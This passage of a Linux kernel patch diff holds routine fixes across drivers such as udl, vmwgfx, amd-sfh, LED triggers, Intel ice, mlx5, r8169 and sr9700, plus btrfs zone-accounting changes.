++static const struct drm_connector_helper_funcs udl_connector_helper_funcs = {
++	.get_modes = udl_connector_helper_get_modes,
++};
++
++static int udl_get_edid_block(void *data, u8 *buf, unsigned int block, size_t len)
++{
++	struct udl_device *udl = data;
++	struct drm_device *dev = &udl->drm;
++	struct usb_device *udev = udl_to_usb_device(udl);
++	u8 *read_buff;
++	int ret;
++	size_t i;
++
++	read_buff = kmalloc(2, GFP_KERNEL);
++	if (!read_buff)
++		return -ENOMEM;
++
++	for (i = 0; i < len; i++) {
++		int bval = (i + block * EDID_LENGTH) << 8;
++
++		ret = usb_control_msg(udev, usb_rcvctrlpipe(udev, 0),
++				      0x02, (0x80 | (0x02 << 5)), bval,
++				      0xA1, read_buff, 2, USB_CTRL_GET_TIMEOUT);
++		if (ret < 0) {
++			drm_err(dev, "Read EDID byte %zu failed err %x\n", i, ret);
++			goto err_kfree;
++		} else if (ret < 1) {
++			ret = -EIO;
++			drm_err(dev, "Read EDID byte %zu failed\n", i);
++			goto err_kfree;
++		}
++
++		buf[i] = read_buff[1];
++	}
++
++	kfree(read_buff);
++
++	return 0;
++
++err_kfree:
++	kfree(read_buff);
++	return ret;
++}
++
++static enum drm_connector_status udl_connector_detect(struct drm_connector *connector, bool force)
++{
++	struct udl_device *udl = to_udl(connector->dev);
++	struct udl_connector *udl_connector = to_udl_connector(connector);
++
++	/* cleanup previous EDID */
++	kfree(udl_connector->edid);
++
++	udl_connector->edid = drm_do_get_edid(connector, udl_get_edid_block, udl);
++	if (!udl_connector->edid)
++		return connector_status_disconnected;
++
++	return connector_status_connected;
++}
++
++static void udl_connector_destroy(struct drm_connector *connector)
++{
++	struct udl_connector *udl_connector = to_udl_connector(connector);
++
++	drm_connector_cleanup(connector);
++	kfree(udl_connector->edid);
++	kfree(udl_connector);
++}
++
++static const struct drm_connector_funcs udl_connector_funcs = {
++	.reset = drm_atomic_helper_connector_reset,
++	.detect = udl_connector_detect,
++	.fill_modes = drm_helper_probe_single_connector_modes,
++	.destroy = udl_connector_destroy,
++	.atomic_duplicate_state = drm_atomic_helper_connector_duplicate_state,
++	.atomic_destroy_state = drm_atomic_helper_connector_destroy_state,
++};
++
++struct drm_connector *udl_connector_init(struct drm_device *dev)
++{
++	struct udl_connector *udl_connector;
++	struct drm_connector *connector;
++	int ret;
++
++	udl_connector = kzalloc(sizeof(*udl_connector), GFP_KERNEL);
++	if (!udl_connector)
++		return ERR_PTR(-ENOMEM);
++
++	connector = &udl_connector->connector;
++	ret = drm_connector_init(dev, connector, &udl_connector_funcs, DRM_MODE_CONNECTOR_VGA);
++	if (ret)
++		goto err_kfree;
++
++	drm_connector_helper_add(connector, &udl_connector_helper_funcs);
++
++	connector->polled = DRM_CONNECTOR_POLL_CONNECT |
++			    DRM_CONNECTOR_POLL_DISCONNECT;
++
++	return connector;
++
++err_kfree:
++	kfree(udl_connector);
++	return ERR_PTR(ret);
++}
++
+ /*
+  * Modesetting
+  */
+ 
++static enum drm_mode_status udl_mode_config_mode_valid(struct drm_device *dev,
++						       const struct drm_display_mode *mode)
++{
++	struct udl_device *udl = to_udl(dev);
++
++	if (udl->sku_pixel_limit) {
++		if (mode->vdisplay * mode->hdisplay > udl->sku_pixel_limit)
++			return MODE_MEM;
++	}
++
++	return MODE_OK;
++}
++
+ static const struct drm_mode_config_funcs udl_mode_funcs = {
+ 	.fb_create = drm_gem_fb_create_with_dirty,
++	.mode_valid = udl_mode_config_mode_valid,
+ 	.atomic_check  = drm_atomic_helper_check,
+ 	.atomic_commit = drm_atomic_helper_commit,
+ };
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c b/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
+index 95344735d00e6..add39769283f6 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
+@@ -32,7 +32,6 @@
+ #define VMW_FENCE_WRAP (1 << 31)
+ 
+ struct vmw_fence_manager {
+-	int num_fence_objects;
+ 	struct vmw_private *dev_priv;
+ 	spinlock_t lock;
+ 	struct list_head fence_list;
+@@ -124,13 +123,13 @@ static void vmw_fence_obj_destroy(struct dma_fence *f)
+ {
+ 	struct vmw_fence_obj *fence =
+ 		container_of(f, struct vmw_fence_obj, base);
+-
+ 	struct vmw_fence_manager *fman = fman_from_fence(fence);
+ 
+-	spin_lock(&fman->lock);
+-	list_del_init(&fence->head);
+-	--fman->num_fence_objects;
+-	spin_unlock(&fman->lock);
++	if (!list_empty(&fence->head)) {
++		spin_lock(&fman->lock);
++		list_del_init(&fence->head);
++		spin_unlock(&fman->lock);
++	}
+ 	fence->destroy(fence);
+ }
+ 
+@@ -257,7 +256,6 @@ static const struct dma_fence_ops vmw_fence_ops = {
+ 	.release = vmw_fence_obj_destroy,
+ };
+ 
+-
+ /*
+  * Execute signal actions on fences recently signaled.
+  * This is done from a workqueue so we don't have to execute
+@@ -355,7 +353,6 @@ static int vmw_fence_obj_init(struct vmw_fence_manager *fman,
+ 		goto out_unlock;
+ 	}
+ 	list_add_tail(&fence->head, &fman->fence_list);
+-	++fman->num_fence_objects;
+ 
+ out_unlock:
+ 	spin_unlock(&fman->lock);
+@@ -403,7 +400,7 @@ static bool vmw_fence_goal_new_locked(struct vmw_fence_manager *fman,
+ 				      u32 passed_seqno)
+ {
+ 	u32 goal_seqno;
+-	struct vmw_fence_obj *fence;
++	struct vmw_fence_obj *fence, *next_fence;
+ 
+ 	if (likely(!fman->seqno_valid))
+ 		return false;
+@@ -413,7 +410,7 @@ static bool vmw_fence_goal_new_locked(struct vmw_fence_manager *fman,
+ 		return false;
+ 
+ 	fman->seqno_valid = false;
+-	list_for_each_entry(fence, &fman->fence_list, head) {
++	list_for_each_entry_safe(fence, next_fence, &fman->fence_list, head) {
+ 		if (!list_empty(&fence->seq_passed_actions)) {
+ 			fman->seqno_valid = true;
+ 			vmw_fence_goal_write(fman->dev_priv,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+index abc354ead4e8b..5dcddcb59a6f7 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+@@ -98,7 +98,7 @@ static int vmw_overlay_send_put(struct vmw_private *dev_priv,
+ {
+ 	struct vmw_escape_video_flush *flush;
+ 	size_t fifo_size;
+-	bool have_so = (dev_priv->active_display_unit == vmw_du_screen_object);
++	bool have_so = (dev_priv->active_display_unit != vmw_du_legacy);
+ 	int i, num_items;
+ 	SVGAGuestPtr ptr;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+index 6dd33d1258d11..e98fde90f4e0c 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+@@ -1015,6 +1015,32 @@ vmw_stdu_connector_mode_valid(struct drm_connector *connector,
+ 	return MODE_OK;
+ }
+ 
++/*
++ * Trigger a modeset if the X,Y position of the Screen Target changes.
++ * This is needed when multi-mon is cycled. The original Screen Target will have
++ * the same mode but its relative X,Y position in the topology will change.
++ */
++static int vmw_stdu_connector_atomic_check(struct drm_connector *conn,
++					   struct drm_atomic_state *state)
++{
++	struct drm_connector_state *conn_state;
++	struct vmw_screen_target_display_unit *du;
++	struct drm_crtc_state *new_crtc_state;
++
++	conn_state = drm_atomic_get_connector_state(state, conn);
++	du = vmw_connector_to_stdu(conn);
++
++	if (!conn_state->crtc)
++		return 0;
++
++	new_crtc_state = drm_atomic_get_new_crtc_state(state, conn_state->crtc);
++	if (du->base.gui_x != du->base.set_gui_x ||
++	    du->base.gui_y != du->base.set_gui_y)
++		new_crtc_state->mode_changed = true;
++
++	return 0;
++}
++
+ static const struct drm_connector_funcs vmw_stdu_connector_funcs = {
+ 	.dpms = vmw_du_connector_dpms,
+ 	.detect = vmw_du_connector_detect,
+@@ -1029,7 +1055,8 @@ static const struct drm_connector_funcs vmw_stdu_connector_funcs = {
+ static const struct
+ drm_connector_helper_funcs vmw_stdu_connector_helper_funcs = {
+ 	.get_modes = vmw_connector_get_modes,
+-	.mode_valid = vmw_stdu_connector_mode_valid
++	.mode_valid = vmw_stdu_connector_mode_valid,
++	.atomic_check = vmw_stdu_connector_atomic_check,
+ };
+ 
+ 
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_client.c b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+index c751d12f5df89..4343fef7dd83e 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_client.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+@@ -214,7 +214,7 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 	struct device *dev;
+ 	u32 feature_report_size;
+ 	u32 input_report_size;
+-	int rc, i, status;
++	int rc, i;
+ 	u8 cl_idx;
+ 
+ 	req_list = &cl_data->req_list;
+@@ -285,24 +285,27 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 		if (rc)
+ 			goto cleanup;
+ 		mp2_ops->start(privdata, info);
+-		status = amd_sfh_wait_for_response
+-				(privdata, cl_data->sensor_idx[i], SENSOR_ENABLED);
+-		if (status == SENSOR_ENABLED) {
++		cl_data->sensor_sts[i] = amd_sfh_wait_for_response
++						(privdata, cl_data->sensor_idx[i], SENSOR_ENABLED);
++
++		if (cl_data->sensor_sts[i] == SENSOR_ENABLED)
+ 			cl_data->is_any_sensor_enabled = true;
+-			cl_data->sensor_sts[i] = SENSOR_ENABLED;
+-			rc = amdtp_hid_probe(cl_data->cur_hid_dev, cl_data);
+-			if (rc) {
+-				mp2_ops->stop(privdata, cl_data->sensor_idx[i]);
+-				status = amd_sfh_wait_for_response
+-					(privdata, cl_data->sensor_idx[i], SENSOR_DISABLED);
+-				if (status != SENSOR_ENABLED)
+-					cl_data->sensor_sts[i] = SENSOR_DISABLED;
+-				dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
+-					cl_data->sensor_idx[i],
+-					get_sensor_name(cl_data->sensor_idx[i]),
+-					cl_data->sensor_sts[i]);
++	}
++
++	if (!cl_data->is_any_sensor_enabled ||
++	    (mp2_ops->discovery_status && mp2_ops->discovery_status(privdata) == 0)) {
++		dev_warn(dev, "Failed to discover, sensors not enabled is %d\n",
++			 cl_data->is_any_sensor_enabled);
++		rc = -EOPNOTSUPP;
++		goto cleanup;
++	}
++
++	for (i = 0; i < cl_data->num_hid_devices; i++) {
++		cl_data->cur_hid_dev = i;
++		if (cl_data->sensor_sts[i] == SENSOR_ENABLED) {
++			rc = amdtp_hid_probe(i, cl_data);
++			if (rc)
+ 				goto cleanup;
+-			}
+ 		} else {
+ 			cl_data->sensor_sts[i] = SENSOR_DISABLED;
+ 			dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
+@@ -314,27 +317,13 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 			cl_data->sensor_idx[i], get_sensor_name(cl_data->sensor_idx[i]),
+ 			cl_data->sensor_sts[i]);
+ 	}
+-	if (!cl_data->is_any_sensor_enabled ||
+-	   (mp2_ops->discovery_status && mp2_ops->discovery_status(privdata) == 0)) {
+-		amd_sfh_hid_client_deinit(privdata);
+-		for (i = 0; i < cl_data->num_hid_devices; i++) {
+-			devm_kfree(dev, cl_data->feature_report[i]);
+-			devm_kfree(dev, in_data->input_report[i]);
+-			devm_kfree(dev, cl_data->report_descr[i]);
+-		}
+-		dev_warn(dev, "Failed to discover, sensors not enabled is %d\n", cl_data->is_any_sensor_enabled);
+-		return -EOPNOTSUPP;
+-	}
++
+ 	schedule_delayed_work(&cl_data->work_buffer, msecs_to_jiffies(AMD_SFH_IDLE_LOOP));
+ 	return 0;
+ 
+ cleanup:
++	amd_sfh_hid_client_deinit(privdata);
+ 	for (i = 0; i < cl_data->num_hid_devices; i++) {
+-		if (in_data->sensor_virt_addr[i]) {
+-			dma_free_coherent(&privdata->pdev->dev, 8 * sizeof(int),
+-					  in_data->sensor_virt_addr[i],
+-					  cl_data->sensor_dma_addr[i]);
+-		}
+ 		devm_kfree(dev, cl_data->feature_report[i]);
+ 		devm_kfree(dev, in_data->input_report[i]);
+ 		devm_kfree(dev, cl_data->report_descr[i]);
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 53235b276bb24..05e40880e7d46 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -709,13 +709,12 @@ static int wacom_intuos_get_tool_type(int tool_id)
+ 	case 0x8e2: /* IntuosHT2 pen */
+ 	case 0x022:
+ 	case 0x200: /* Pro Pen 3 */
+-	case 0x04200: /* Pro Pen 3 */
+ 	case 0x10842: /* MobileStudio Pro Pro Pen slim */
+ 	case 0x14802: /* Intuos4/5 13HD/24HD Classic Pen */
+ 	case 0x16802: /* Cintiq 13HD Pro Pen */
+ 	case 0x18802: /* DTH2242 Pen */
+ 	case 0x10802: /* Intuos4/5 13HD/24HD General Pen */
+-	case 0x80842: /* Intuos Pro and Cintiq Pro 3D Pen */
++	case 0x8842: /* Intuos Pro and Cintiq Pro 3D Pen */
+ 		tool_type = BTN_TOOL_PEN;
+ 		break;
+ 
+diff --git a/drivers/leds/led-triggers.c b/drivers/leds/led-triggers.c
+index 024b73f84ce0c..3d3673c197e38 100644
+--- a/drivers/leds/led-triggers.c
++++ b/drivers/leds/led-triggers.c
+@@ -193,11 +193,24 @@ int led_trigger_set(struct led_classdev *led_cdev, struct led_trigger *trig)
+ 		spin_unlock(&trig->leddev_list_lock);
+ 		led_cdev->trigger = trig;
+ 
++		/*
++		 * Some activate() calls use led_trigger_event() to initialize
++		 * the brightness of the LED for which the trigger is being set.
++		 * Ensure the led_cdev is visible on trig->led_cdevs for this.
++		 */
++		synchronize_rcu();
++
++		/*
++		 * If "set brightness to 0" is pending in workqueue,
++		 * we don't want that to be reordered after ->activate()
++		 */
++		flush_work(&led_cdev->set_brightness_work);
++
++		ret = 0;
+ 		if (trig->activate)
+ 			ret = trig->activate(led_cdev);
+ 		else
+-			ret = 0;
+-
++			led_set_brightness(led_cdev, trig->brightness);
+ 		if (ret)
+ 			goto err_activate;
+ 
+@@ -268,19 +281,6 @@ void led_trigger_set_default(struct led_classdev *led_cdev)
+ }
+ EXPORT_SYMBOL_GPL(led_trigger_set_default);
+ 
+-void led_trigger_rename_static(const char *name, struct led_trigger *trig)
+-{
+-	/* new name must be on a temporary string to prevent races */
+-	BUG_ON(name == trig->name);
+-
+-	down_write(&triggers_list_lock);
+-	/* this assumes that trig->name was originaly allocated to
+-	 * non constant storage */
+-	strcpy((char *)trig->name, name);
+-	up_write(&triggers_list_lock);
+-}
+-EXPORT_SYMBOL_GPL(led_trigger_rename_static);
+-
+ /* LED Trigger Interface */
+ 
+ int led_trigger_register(struct led_trigger *trig)
+@@ -385,6 +385,8 @@ void led_trigger_event(struct led_trigger *trig,
+ 	if (!trig)
+ 		return;
+ 
++	trig->brightness = brightness;
++
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(led_cdev, &trig->led_cdevs, trig_list)
+ 		led_set_brightness(led_cdev, brightness);
+diff --git a/drivers/leds/trigger/ledtrig-timer.c b/drivers/leds/trigger/ledtrig-timer.c
+index b4688d1d9d2b2..1d213c999d40a 100644
+--- a/drivers/leds/trigger/ledtrig-timer.c
++++ b/drivers/leds/trigger/ledtrig-timer.c
+@@ -110,11 +110,6 @@ static int timer_trig_activate(struct led_classdev *led_cdev)
+ 		led_cdev->flags &= ~LED_INIT_DEFAULT_TRIGGER;
+ 	}
+ 
+-	/*
+-	 * If "set brightness to 0" is pending in workqueue, we don't
+-	 * want that to be reordered after blink_set()
+-	 */
+-	flush_work(&led_cdev->set_brightness_work);
+ 	led_blink_set(led_cdev, &led_cdev->blink_delay_on,
+ 		      &led_cdev->blink_delay_off);
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_txrx.c b/drivers/net/ethernet/intel/ice/ice_txrx.c
+index dbe80e5053a82..bd62781191b3d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_txrx.c
++++ b/drivers/net/ethernet/intel/ice/ice_txrx.c
+@@ -454,7 +454,7 @@ void ice_free_rx_ring(struct ice_rx_ring *rx_ring)
+ 	if (rx_ring->vsi->type == ICE_VSI_PF)
+ 		if (xdp_rxq_info_is_reg(&rx_ring->xdp_rxq))
+ 			xdp_rxq_info_unreg(&rx_ring->xdp_rxq);
+-	rx_ring->xdp_prog = NULL;
++	WRITE_ONCE(rx_ring->xdp_prog, NULL);
+ 	if (rx_ring->xsk_pool) {
+ 		kfree(rx_ring->xdp_buf);
+ 		rx_ring->xdp_buf = NULL;
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index b917f271cdac1..2677d7c86a6d7 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -41,10 +41,8 @@ static void ice_qp_reset_stats(struct ice_vsi *vsi, u16 q_idx)
+ static void ice_qp_clean_rings(struct ice_vsi *vsi, u16 q_idx)
+ {
+ 	ice_clean_tx_ring(vsi->tx_rings[q_idx]);
+-	if (ice_is_xdp_ena_vsi(vsi)) {
+-		synchronize_rcu();
++	if (ice_is_xdp_ena_vsi(vsi))
+ 		ice_clean_tx_ring(vsi->xdp_rings[q_idx]);
+-	}
+ 	ice_clean_rx_ring(vsi->rx_rings[q_idx]);
+ }
+ 
+@@ -172,11 +170,12 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 		usleep_range(1000, 2000);
+ 	}
+ 
++	synchronize_net();
++	netif_tx_stop_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
++
+ 	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
+ 	ice_qvec_toggle_napi(vsi, q_vector, false);
+ 
+-	netif_tx_stop_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
+-
+ 	ice_fill_txq_meta(vsi, tx_ring, &txq_meta);
+ 	err = ice_vsi_stop_tx_ring(vsi, ICE_NO_RESET, 0, tx_ring, &txq_meta);
+ 	if (err)
+@@ -191,10 +190,8 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 		if (err)
+ 			return err;
+ 	}
+-	err = ice_vsi_ctrl_one_rx_ring(vsi, false, q_idx, true);
+-	if (err)
+-		return err;
+ 
++	ice_vsi_ctrl_one_rx_ring(vsi, false, q_idx, false);
+ 	ice_qp_clean_rings(vsi, q_idx);
+ 	ice_qp_reset_stats(vsi, q_idx);
+ 
+@@ -937,6 +934,10 @@ bool ice_xmit_zc(struct ice_tx_ring *xdp_ring)
+ 
+ 	ice_clean_xdp_irq_zc(xdp_ring);
+ 
++	if (!netif_carrier_ok(xdp_ring->vsi->netdev) ||
++	    !netif_running(xdp_ring->vsi->netdev))
++		return true;
++
+ 	budget = ICE_DESC_UNUSED(xdp_ring);
+ 	budget = min_t(u16, budget, ICE_RING_QUARTER(xdp_ring));
+ 
+@@ -980,7 +981,7 @@ ice_xsk_wakeup(struct net_device *netdev, u32 queue_id,
+ 	struct ice_vsi *vsi = np->vsi;
+ 	struct ice_tx_ring *ring;
+ 
+-	if (test_bit(ICE_VSI_DOWN, vsi->state))
++	if (test_bit(ICE_VSI_DOWN, vsi->state) || !netif_carrier_ok(netdev))
+ 		return -ENETDOWN;
+ 
+ 	if (!ice_is_xdp_ena_vsi(vsi))
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+index 2f80ee84c7ece..bbcdab562513f 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+@@ -953,13 +953,13 @@ static void mvpp2_bm_pool_update_fc(struct mvpp2_port *port,
+ static void mvpp2_bm_pool_update_priv_fc(struct mvpp2 *priv, bool en)
+ {
+ 	struct mvpp2_port *port;
+-	int i;
++	int i, j;
+ 
+ 	for (i = 0; i < priv->port_count; i++) {
+ 		port = priv->port_list[i];
+ 		if (port->priv->percpu_pools) {
+-			for (i = 0; i < port->nrxqs; i++)
+-				mvpp2_bm_pool_update_fc(port, &port->priv->bm_pools[i],
++			for (j = 0; j < port->nrxqs; j++)
++				mvpp2_bm_pool_update_fc(port, &port->priv->bm_pools[j],
+ 							port->tx_fc & en);
+ 		} else {
+ 			mvpp2_bm_pool_update_fc(port, port->pool_long, port->tx_fc & en);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+index ceeb23f478e15..3ee61987266c4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+@@ -1223,7 +1223,12 @@ int mlx5e_ethtool_set_link_ksettings(struct mlx5e_priv *priv,
+ 	if (!an_changes && link_modes == eproto.admin)
+ 		goto out;
+ 
+-	mlx5_port_set_eth_ptys(mdev, an_disable, link_modes, ext);
++	err = mlx5_port_set_eth_ptys(mdev, an_disable, link_modes, ext);
++	if (err) {
++		netdev_err(priv->netdev, "%s: failed to set ptys reg: %d\n", __func__, err);
++		goto out;
++	}
++
+ 	mlx5_toggle_port_link(mdev);
+ 
+ out:
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+index dec1492da74de..1a818759a9aac 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+@@ -145,6 +145,7 @@ int mlx5_fw_reset_set_live_patch(struct mlx5_core_dev *dev)
+ static void mlx5_fw_reset_complete_reload(struct mlx5_core_dev *dev)
+ {
+ 	struct mlx5_fw_reset *fw_reset = dev->priv.fw_reset;
++	struct devlink *devlink = priv_to_devlink(dev);
+ 
+ 	/* if this is the driver that initiated the fw reset, devlink completed the reload */
+ 	if (test_bit(MLX5_FW_RESET_FLAGS_PENDING_COMP, &fw_reset->reset_flags)) {
+@@ -155,9 +156,11 @@ static void mlx5_fw_reset_complete_reload(struct mlx5_core_dev *dev)
+ 			mlx5_core_err(dev, "reset reload flow aborted, PCI reads still not working\n");
+ 		else
+ 			mlx5_load_one(dev, true);
+-		devlink_remote_reload_actions_performed(priv_to_devlink(dev), 0,
++		devl_lock(devlink);
++		devlink_remote_reload_actions_performed(devlink, 0,
+ 							BIT(DEVLINK_RELOAD_ACTION_DRIVER_REINIT) |
+ 							BIT(DEVLINK_RELOAD_ACTION_FW_ACTIVATE));
++		devl_unlock(devlink);
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+index a283d8ae466b6..4b4d761081115 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+@@ -1483,7 +1483,7 @@ u8 mlx5_lag_get_slave_port(struct mlx5_core_dev *dev,
+ 		goto unlock;
+ 
+ 	for (i = 0; i < ldev->ports; i++) {
+-		if (ldev->pf[MLX5_LAG_P1].netdev == slave) {
++		if (ldev->pf[i].netdev == slave) {
+ 			port = i;
+ 			break;
+ 		}
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index f83bd15f9e994..b187371fa2f0a 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -4273,7 +4273,8 @@ static netdev_tx_t rtl8169_start_xmit(struct sk_buff *skb,
+ 	if (unlikely(!rtl_tx_slots_avail(tp))) {
+ 		if (net_ratelimit())
+ 			netdev_err(dev, "BUG! Tx Ring full when queue awake!\n");
+-		goto err_stop_0;
++		netif_stop_queue(dev);
++		return NETDEV_TX_BUSY;
+ 	}
+ 
+ 	opts[1] = rtl8169_tx_vlan_tag(skb);
+@@ -4346,11 +4347,6 @@ static netdev_tx_t rtl8169_start_xmit(struct sk_buff *skb,
+ 	dev_kfree_skb_any(skb);
+ 	dev->stats.tx_dropped++;
+ 	return NETDEV_TX_OK;
+-
+-err_stop_0:
+-	netif_stop_queue(dev);
+-	dev->stats.tx_dropped++;
+-	return NETDEV_TX_BUSY;
+ }
+ 
+ static unsigned int rtl_last_frag_len(struct sk_buff *skb)
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+index 5ea9dc251dd9a..ff777735be66b 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+@@ -1825,9 +1825,9 @@ static void axienet_dma_err_handler(struct work_struct *work)
+ 			   ~(XAE_OPTION_TXEN | XAE_OPTION_RXEN));
+ 	axienet_set_mac_address(ndev, NULL);
+ 	axienet_set_multicast_list(ndev);
+-	axienet_setoptions(ndev, lp->options);
+ 	napi_enable(&lp->napi_rx);
+ 	napi_enable(&lp->napi_tx);
++	axienet_setoptions(ndev, lp->options);
+ }
+ 
+ /**
+diff --git a/drivers/net/usb/sr9700.c b/drivers/net/usb/sr9700.c
+index 0a662e42ed965..cb7d2f798fb43 100644
+--- a/drivers/net/usb/sr9700.c
++++ b/drivers/net/usb/sr9700.c
+@@ -179,6 +179,7 @@ static int sr_mdio_read(struct net_device *netdev, int phy_id, int loc)
+ 	struct usbnet *dev = netdev_priv(netdev);
+ 	__le16 res;
+ 	int rc = 0;
++	int err;
+ 
+ 	if (phy_id) {
+ 		netdev_dbg(netdev, "Only internal phy supported\n");
+@@ -189,11 +190,17 @@ static int sr_mdio_read(struct net_device *netdev, int phy_id, int loc)
+ 	if (loc == MII_BMSR) {
+ 		u8 value;
+ 
+-		sr_read_reg(dev, SR_NSR, &value);
++		err = sr_read_reg(dev, SR_NSR, &value);
++		if (err < 0)
++			return err;
++
+ 		if (value & NSR_LINKST)
+ 			rc = 1;
+ 	}
+-	sr_share_read_word(dev, 1, loc, &res);
++	err = sr_share_read_word(dev, 1, loc, &res);
++	if (err < 0)
++		return err;
++
+ 	if (rc == 1)
+ 		res = le16_to_cpu(res) | BMSR_LSTATUS;
+ 	else
+diff --git a/drivers/platform/chrome/cros_ec_proto.c b/drivers/platform/chrome/cros_ec_proto.c
+index 475a6dd72db6b..809fabef3b44a 100644
+--- a/drivers/platform/chrome/cros_ec_proto.c
++++ b/drivers/platform/chrome/cros_ec_proto.c
+@@ -805,9 +805,11 @@ int cros_ec_get_next_event(struct cros_ec_device *ec_dev,
+ 	if (ret == -ENOPROTOOPT) {
+ 		dev_dbg(ec_dev->dev,
+ 			"GET_NEXT_EVENT returned invalid version error.\n");
++		mutex_lock(&ec_dev->lock);
+ 		ret = cros_ec_get_host_command_version_mask(ec_dev,
+ 							EC_CMD_GET_NEXT_EVENT,
+ 							&ver_mask);
++		mutex_unlock(&ec_dev->lock);
+ 		if (ret < 0 || ver_mask == 0)
+ 			/*
+ 			 * Do not change the MKBP supported version if we can't
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 676978f2e9944..e9a0b27e1c4f7 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1065,8 +1065,8 @@ int btrfs_remove_block_group(struct btrfs_trans_handle *trans,
+ 		block_group->space_info->active_total_bytes -= block_group->length;
+ 	block_group->space_info->bytes_readonly -=
+ 		(block_group->length - block_group->zone_unusable);
+-	block_group->space_info->bytes_zone_unusable -=
+-		block_group->zone_unusable;
++	btrfs_space_info_update_bytes_zone_unusable(fs_info, block_group->space_info,
++						    -block_group->zone_unusable);
+ 	block_group->space_info->disk_total -= block_group->length * factor;
+ 
+ 	spin_unlock(&block_group->space_info->lock);
+@@ -1250,7 +1250,8 @@ static int inc_block_group_ro(struct btrfs_block_group *cache, int force)
+ 		if (btrfs_is_zoned(cache->fs_info)) {
+ 			/* Migrate zone_unusable bytes to readonly */
+ 			sinfo->bytes_readonly += cache->zone_unusable;
+-			sinfo->bytes_zone_unusable -= cache->zone_unusable;
++			btrfs_space_info_update_bytes_zone_unusable(cache->fs_info, sinfo,
++								    -cache->zone_unusable);
+ 			cache->zone_unusable = 0;
+ 		}
+ 		cache->ro++;
+@@ -2812,9 +2813,11 @@ void btrfs_dec_block_group_ro(struct btrfs_block_group *cache)
+ 		if (btrfs_is_zoned(cache->fs_info)) {
+ 			/* Migrate zone_unusable bytes back */
+ 			cache->zone_unusable =
+-				(cache->alloc_offset - cache->used) +
++				(cache->alloc_offset - cache->used - cache->pinned -
++				 cache->reserved) +
+ 				(cache->length - cache->zone_capacity);
+-			sinfo->bytes_zone_unusable += cache->zone_unusable;
++			btrfs_space_info_update_bytes_zone_unusable(cache->fs_info, sinfo,
++								    cache->zone_unusable);
+ 			sinfo->bytes_readonly -= cache->zone_unusable;
+ 		}
+ 		num_bytes = cache->length - cache->reserved -
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 0d2cc186974d5..528cd88a77fd7 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -2731,7 +2731,8 @@ static int unpin_extent_range(struct btrfs_fs_info *fs_info,
+ 			readonly = true;
